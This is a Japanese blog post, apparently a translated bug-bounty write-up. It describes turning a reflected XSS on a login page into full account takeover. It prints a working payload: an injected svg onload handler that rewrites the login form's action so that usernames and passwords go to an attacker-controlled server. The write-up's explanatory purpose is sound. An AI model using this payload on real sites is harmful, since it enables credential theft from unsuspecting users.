Shikata Ga Nai

Private? There is no such things.

How I get Full Account Takeover via stealing action’s login form | XSSを訳してみた

Hello there, ('ω')ノ

 

窃盗アクションのログインフォームで完全なアカウント乗っ取りを取得する方法を。

 

脆弱性:

 XSS

 アカウント乗っ取り

 

記事:

 https://medium.com/@mohamedtarekq/how-i-get-full-account-takeover-via-stealing-actions-login-form-xss-9e50068c2b2d

 

今回は、ログイン ページに XSS がある場合に、ログイン フォームのアクションを。

盗んでアカウントの完全な乗っ取りを取得する方法について説明することに。

このプログラムをexample.comとよぶことに。

 

XSS を見つけた方法:

偵察を行うときは、通常、ターゲットの Web アーカイブ URL を確認して。

下記のURL を見つけて。

 https://www.example.com/account/?jid=77877

 

jid パラメーターには検証がないため、単純な XSS ペイロードを追加すると。

アラートが発生して。

 

 

しかし、プログラムの概要は次のように述べていて。

    XSS の問題については、セッション Cookie やその他の機密情報を。

 実際に盗むことができることを示す POC を提供するようと。

 ポップアップに Cookie を表示するだけでは有効とは見なされず。

 その代わりに、セッション Cookie を同一オリジン ポリシーの制限外で。

 送信できることを示すようと。

 これを示さない XSS の問題は、有効な問題とは見なされず。

 

アカウントの乗っ取りにエスカレーションする時間:

ログインページにいて、このページのすべてをJavaScriptで制御できるXSSを。

持っていると自問して。

では、ログインフォームのアクションを変更して、ユーザ名とパスワードを。

サーバに送信するとどうなるか。

このような単純な JavaScript コードは、フォームのアクションに変更して。

 

 document.forms[1].action='https:///?Hacked'

 

最終ペイロード:

 https://www.example.com/account/?jid=77877"><svg onload=document.forms[1].action='https:///?Hacked'>

 

サーバとして Burb Collaborator を使用して確認すると。

ユーザ名とパスワードが見つかって。

 

 

Best regards, (^^ゞ